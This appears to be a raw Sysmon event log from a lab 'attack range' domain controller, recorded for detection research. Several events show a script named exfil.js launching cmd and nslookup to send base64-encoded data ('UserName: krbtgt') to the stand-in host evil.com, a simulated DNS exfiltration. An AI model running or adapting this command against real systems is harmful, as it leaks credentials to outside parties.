10341000x8000000000000000207289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.051{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-F642-000000005F02}4228C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.051{2E1864BB-18E7-629A-F442-000000005F02}73001080C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-F642-000000005F02}4228C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.061{2E1864BB-18E7-629A-F642-000000005F02}4228C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-F442-000000005F02}7300C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlthmyoh.tmp 2>&1 354300x8000000000000000207286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.643{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50518- 354300x8000000000000000207285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.575{00000000-0000-0000-0000-000000000000}7388<unknown process>-udpfalsefalse127.0.0.1-50517-false127.0.0.1-53domain 354300x8000000000000000207284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.575{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62065-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.574{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62065-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.574{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50517- 354300x8000000000000000207281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.574{00000000-0000-0000-0000-000000000000}7388<unknown process>-udptruefalse127.0.0.1-50517-false127.0.0.1-53domain 354300x8000000000000000207280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.574{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50516- 354300x8000000000000000207279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.574{00000000-0000-0000-0000-000000000000}7388<unknown process>-udptruefalse127.0.0.1-50516-false127.0.0.1-53domain 354300x8000000000000000207278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.573{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50515- 354300x8000000000000000207277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.573{00000000-0000-0000-0000-000000000000}7388<unknown process>-udptruefalse127.0.0.1-50515-false127.0.0.1-53domain 354300x8000000000000000207276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.515{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61467-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.514{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61467-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.514{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50514- 354300x8000000000000000207273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.514{00000000-0000-0000-0000-000000000000}488<unknown process>-udptruefalse127.0.0.1-50514-false127.0.0.1-53domain 354300x8000000000000000207272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.514{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50513- 354300x8000000000000000207271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.514{00000000-0000-0000-0000-000000000000}488<unknown process>-udptruefalse127.0.0.1-50513-false127.0.0.1-53domain 354300x8000000000000000207270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.513{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50512- 354300x8000000000000000207269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.513{00000000-0000-0000-0000-000000000000}488<unknown process>-udptruefalse127.0.0.1-50512-false127.0.0.1-53domain 354300x8000000000000000207268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.453{00000000-0000-0000-0000-000000000000}1400<unknown process>-udpfalsefalse127.0.0.1-50511-false127.0.0.1-53domain 354300x8000000000000000207267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.453{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62401-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.452{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62401-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.452{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50511- 354300x8000000000000000207264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.452{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50510- 354300x8000000000000000207263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.451{00000000-0000-0000-0000-000000000000}1400<unknown process>-udpfalsefalse127.0.0.1-50509-false127.0.0.1-53domain 354300x8000000000000000207262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.451{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50509- 354300x8000000000000000207261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.451{00000000-0000-0000-0000-000000000000}1400<unknown process>-udptruefalse127.0.0.1-50509-false127.0.0.1-53domain 23542300x8000000000000000207260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.051{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=585F0744307B724F9576DBE47D93F37C,SHA256=885D287C2B5AAFD9CB36A386E021C93AA11AF00F6A03D5005521735FA4E8BFDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000207259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.360{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-50508-false127.0.0.1-53domain 354300x8000000000000000207258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.360{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50508- 354300x8000000000000000207257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.360{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-50508-false127.0.0.1-53domain 354300x8000000000000000207256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.360{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-50507-false127.0.0.1-53domain 354300x8000000000000000207255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.360{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50507- 354300x8000000000000000207254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.360{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-50507-false127.0.0.1-53domain 354300x8000000000000000207253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.359{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50506- 354300x8000000000000000207252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.359{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-50506-false127.0.0.1-53domain 354300x8000000000000000207251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.293{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61739-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.292{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61739-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.292{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50505- 354300x8000000000000000207248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.292{00000000-0000-0000-0000-000000000000}6580<unknown process>-udptruefalse127.0.0.1-50505-false127.0.0.1-53domain 354300x8000000000000000207247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.292{00000000-0000-0000-0000-000000000000}6580<unknown process>-udpfalsefalse127.0.0.1-50504-false127.0.0.1-53domain 354300x8000000000000000207246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.292{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50504- 354300x8000000000000000207245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.292{00000000-0000-0000-0000-000000000000}6580<unknown process>-udptruefalse127.0.0.1-50504-false127.0.0.1-53domain 354300x8000000000000000207244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.292{00000000-0000-0000-0000-000000000000}6580<unknown process>-udpfalsefalse127.0.0.1-50503-false127.0.0.1-53domain 354300x8000000000000000207243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.291{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50503- 354300x8000000000000000207242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.291{00000000-0000-0000-0000-000000000000}6580<unknown process>-udptruefalse127.0.0.1-50503-false127.0.0.1-53domain 354300x8000000000000000207241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.229{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50502- 354300x8000000000000000207240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.229{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50501- 354300x8000000000000000207239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.858{00000000-0000-0000-0000-000000000000}5740<unknown process>-udptruefalse127.0.0.1-50487-false127.0.0.1-53domain 354300x8000000000000000207238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.784{00000000-0000-0000-0000-000000000000}6092<unknown process>-udpfalsefalse127.0.0.1-50486-false127.0.0.1-53domain 354300x8000000000000000207237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.783{00000000-0000-0000-0000-000000000000}6092<unknown process>-udptruefalse127.0.0.1-50486-false127.0.0.1-53domain 354300x8000000000000000207236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.379{00000000-0000-0000-0000-000000000000}7732<unknown process>-udpfalsefalse127.0.0.1-50471-false127.0.0.1-53domain 354300x8000000000000000207235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.377{00000000-0000-0000-0000-000000000000}7732<unknown process>-udpfalsefalse127.0.0.1-50470-false127.0.0.1-53domain 354300x8000000000000000207234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.377{00000000-0000-0000-0000-000000000000}7732<unknown process>-udpfalsefalse127.0.0.1-50469-false127.0.0.1-53domain 354300x8000000000000000207233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.104{00000000-0000-0000-0000-000000000000}6604<unknown process>-udptruefalse127.0.0.1-50465-false127.0.0.1-53domain 354300x8000000000000000207232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.104{00000000-0000-0000-0000-000000000000}6604<unknown process>-udptruefalse127.0.0.1-50464-false127.0.0.1-53domain 354300x8000000000000000207231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.104{00000000-0000-0000-0000-000000000000}6604<unknown process>-udpfalsefalse127.0.0.1-50463-false127.0.0.1-53domain 10341000x8000000000000000207230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.036{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-F542-000000005F02}5420C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.036{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-F542-000000005F02}5420C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.036{2E1864BB-18E7-629A-F542-000000005F02}54206432C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-F442-000000005F02}7300C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.021{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-F542-000000005F02}5420C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.021{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.021{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.004{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-F442-000000005F02}7300C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.004{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.004{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.004{2E1864BB-18E0-629A-6742-000000005F02}39766160C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-F442-000000005F02}7300C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.019{2E1864BB-18E7-629A-F442-000000005F02}7300C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlthmyoh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 